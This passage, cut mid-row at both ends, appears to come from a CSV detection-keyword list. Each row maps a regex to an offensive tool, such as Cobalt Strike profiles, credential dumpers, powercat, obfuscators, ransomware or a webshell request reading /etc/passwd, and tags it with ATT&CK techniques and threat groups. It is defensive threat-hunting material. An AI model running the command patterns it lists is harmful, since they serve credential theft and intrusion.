APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.news.123456.*",".{0,1000}\.news\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.nimplant*",".{0,1000}\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Roles_Admins.txt*",".{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Users_Detailed.csv*",".{0,1000}\.O365\.Users_Detailed\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Users_LDAP_details.txt*",".{0,1000}\.O365\.Users_LDAP_details\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Users_ProxyAddresses.txt*",".{0,1000}\.O365\.Users_ProxyAddresses\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.onion/chat.html?*",".{0,1000}\.onion\/chat\.html\?.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*.onion:31337*",".{0,1000}\.onion\:31337.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*.onion:8000*",".{0,1000}\.onion\:8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*.onion:81*",".{0,1000}\.onion\:81.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*.pdf.bat*",".{0,1000}\.pdf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.dll*",".{0,1000}\.pdf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.exe*",".{0,1000}\.pdf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.htm",".{0,1000}\.pdf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.iso*",".{0,1000}\.pdf\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.jar*",".{0,1000}\.pdf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.jasmin*",".{0,1000}\.pdf\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.pdf.js*",".{0,1000}\.pdf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.sfx*",".{0,1000}\.pdf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.vbs*",".{0,1000}\.pdf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.photos.123456.*",".{0,1000}\.photos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.php?cmd=cat+/etc/passwd*",".{0,1000}\.php\?cmd\=cat\+\/etc\/passwd.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*.pic.123456.*",".{0,1000}\.pic\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.pipename_stager*",".{0,1000}\.pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.png.jasmin*",".{0,1000}\.png\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.pop.123456.*",".{0,1000}\.pop\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ppt.bat*",".{0,1000}\.ppt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.dll*",".{0,1000}\.ppt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.exe*",".{0,1000}\.ppt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.htm*",".{0,1000}\.ppt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.iso*",".{0,1000}\.ppt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.jar*",".{0,1000}\.ppt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.js*",".{0,1000}\.ppt\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.sfx*",".{0,1000}\.ppt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.vbs*",".{0,1000}\.ppt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.bat*",".{0,1000}\.pptx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.dll*",".{0,1000}\.pptx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.exe*",".{0,1000}\.pptx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.htm*",".{0,1000}\.pptx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.iso*",".{0,1000}\.pptx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.jar*",".{0,1000}\.pptx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.jasmin*",".{0,1000}\.pptx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.pptx.js*",".{0,1000}\.pptx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.sfx*",".{0,1000}\.pptx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.vbs*",".{0,1000}\.pptx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.PrivilegeEscalation.Exchange*",".{0,1000}\.PrivilegeEscalation\.Exchange.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.ps1 -Base *OU=*DC=* -Credentials * -Server *",".{0,1000}\.ps1\s\-Base\s.{0,1000}OU\=.{0,1000}DC\=.{0,1000}\s\-Credentials\s.{0,1000}\s\-Server\s.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*",".{0,1000}\.ps1\s\-dcip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password.{0,1000}\s\-ExportToCSV\s.{0,1000}\.csv\s\-ExportToJSON\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*.ps1 -l -p * -r dns:::*",".{0,1000}\.ps1\s\-l\s\-p\s.{0,1000}\s\-r\sdns\:\:\:.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*.ps1 -StartWebServer Powershell*",".{0,1000}\.ps1\s\-StartWebServer\sPowershell.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*.ps1 -StartWebServer Python*",".{0,1000}\.ps1\s\-StartWebServer\sPython.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*.ps1 -technique BetterXencrypt*",".{0,1000}\.ps1\s\-technique\sBetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique Chameleon*",".{0,1000}\.ps1\s\-technique\sChameleon.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique PSObfuscation*",".{0,1000}\.ps1\s\-technique\sPSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique PyFuscation*",".{0,1000}\.ps1\s\-technique\sPyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique ReverseB64*",".{0,1000}\.ps1\s\-technique\sReverseB64.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -WifiPasswords Dump*",".{0,1000}\.ps1\s\-WifiPasswords\sDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*.py -credz *.txt * ",".{0,1000}\.py\s\s\-credz\s.{0,1000}\.txt\s.{0,1000}\s","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*.py -k * -f *.bat -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.bat\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user 